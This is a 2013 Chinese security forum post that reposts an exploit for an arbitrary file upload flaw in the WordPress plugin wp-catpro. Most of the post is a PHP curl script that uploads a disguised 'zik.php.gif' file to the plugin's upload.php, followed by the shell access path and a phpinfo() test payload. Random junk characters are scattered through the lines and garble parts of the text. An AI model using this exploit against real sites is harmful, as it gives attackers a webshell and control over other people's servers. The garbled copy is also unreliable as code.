找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2177|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability( v1 ~$ n/ ~2 A% e' G
#-----------------------------------------------------------------------
2 J3 W' d; b8 j/ {, N
( O; W4 o1 X9 X9 c' I! A作者  => Zikou-16  h( [& O" b+ l/ Q, l
邮箱 => zikou16x@gmail.com& U; T( {- v& ^, z5 Q- H' f
测试系统 : Windows 7 , Backtrack 5r3
( d* l4 z1 B! X& M9 }下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip1 q" @% ?, y+ |: x, }# h* d
####
: E$ `7 j3 c6 I8 x" X' U ; h" k( E+ D& ?
#=> Exploit 信息:* r' ]' n* \  W, t1 m
------------------
# |& y6 }. Q: I  H9 y; X+ _# 攻击者可以上传 file/shell.php.gif# E  D5 m; x7 |# c
# ("jpg", "gif", "png")  // Allowed file extensions# ~5 G, K9 _& e
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
* g2 Z: j* \' X9 d4 G2 ?# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ L- G5 b- p& G8 l' }------------------; }% R4 w1 |6 D; s+ i, q
9 a, E; L4 D! |3 O, C2 ~8 U) B- Y6 n
#=> Exploit$ x# J# M; T6 T! J
-----------
- D" U" g- X: E6 R- |<?php
9 T' S$ _/ t; a) c  p1 I ' T5 U& d! M' ^- H- V1 v: [
$uploadfile="zik.php.gif";, r) d% n% {8 |! ~
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* Q- W4 Y. q6 r  k( Z% d0 acurl_setopt($ch, CURLOPT_POST, true);
; }' Q0 q1 P# f4 t& ncurl_setopt($ch, CURLOPT_POSTFIELDS,8 X8 K3 y# T5 A' b8 R
array('Filedata'=>"@$uploadfile",0 ]# A9 l% }. j7 |" ]* O5 m( O
'folder'=>'/wp-content/uploads/catpro/'));
" T3 ~' u% M' k* V5 scurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);# Z1 Y- R. ?+ Y  w
$postResult = curl_exec($ch);
3 t) M8 H. W9 d. f) {. c% ocurl_close($ch);
; t9 v- ~- D# G 7 e/ w- ~* U& f
print "$postResult";& W4 k% O9 ?# K- f" s) J

; r/ C* u, c- w: b% V6 e/ W2 a9 pShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
( b, k2 G' t4 `- r/ W" q5 [  ?>5 i: E+ N: `5 y  J+ g& e2 a
<?php
4 a% |+ j  H3 O9 |2 X$ i" X! E9 cphpinfo();
5 w: a  N/ |2 ?+ L9 m$ E. V?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表